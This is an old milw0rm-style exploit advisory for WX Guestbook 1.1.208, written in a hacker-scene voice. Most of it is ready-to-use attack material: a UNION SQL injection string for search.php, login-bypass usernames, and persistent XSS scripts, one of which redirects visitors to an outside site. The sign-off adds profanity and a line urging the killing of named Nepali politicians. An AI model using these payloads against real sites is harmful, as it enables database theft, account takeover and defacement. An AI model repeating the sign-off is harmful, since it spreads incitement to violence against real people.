49 lines
No EOL
1.7 KiB
Text
49 lines
No EOL
1.7 KiB
Text
###########################################
|
|
# WX Guest Book 1.1.208 Vulns #
|
|
# By learn3r hacker from nepal #
|
|
# damagicalhacker@gmail.com #
|
|
###########################################
|
|
|
|
Product name: WX Guestbook 1.1.208
|
|
Product vendor: www.webilix.com
|
|
|
|
This product suffers from multiple SQLi and persistent XSS vuln.
|
|
|
|
############## SQL Search Vuln ###############
|
|
|
|
The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server.
|
|
|
|
SQL query:
|
|
$signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC");
|
|
|
|
The $QUERY is what we submit through search box so injecting this will sql inject the server.
|
|
The following is the sample sql injection example.
|
|
|
|
|
|
Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*
|
|
|
|
############## SQL login bypass ###############
|
|
The username and password fields are unsanitized and hence we can bypass the login systems.
|
|
|
|
Username: admin'))/*
|
|
Password: learn3r [or whatever]
|
|
|
|
Or
|
|
|
|
Username: ')) or 1=1/*
|
|
Password: learn3r [or whatever]
|
|
|
|
############## Persistent XSS Vulns ##############
|
|
|
|
In the name field (I suppose as I don't understand arabic), you can inject XSS...
|
|
<script>alert(String.fromCharCode(97));</script>
|
|
<script>location.replace("http://www.nepalihackerz.com.np")</script>
|
|
|
|
Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
|
|
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
|
|
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar
|
|
|
|
By learn3r aka cyb3r lord
|
|
Nepali Hackerz Are Not Dead!!!
|
|
|
|
# milw0rm.com [2009-09-21] |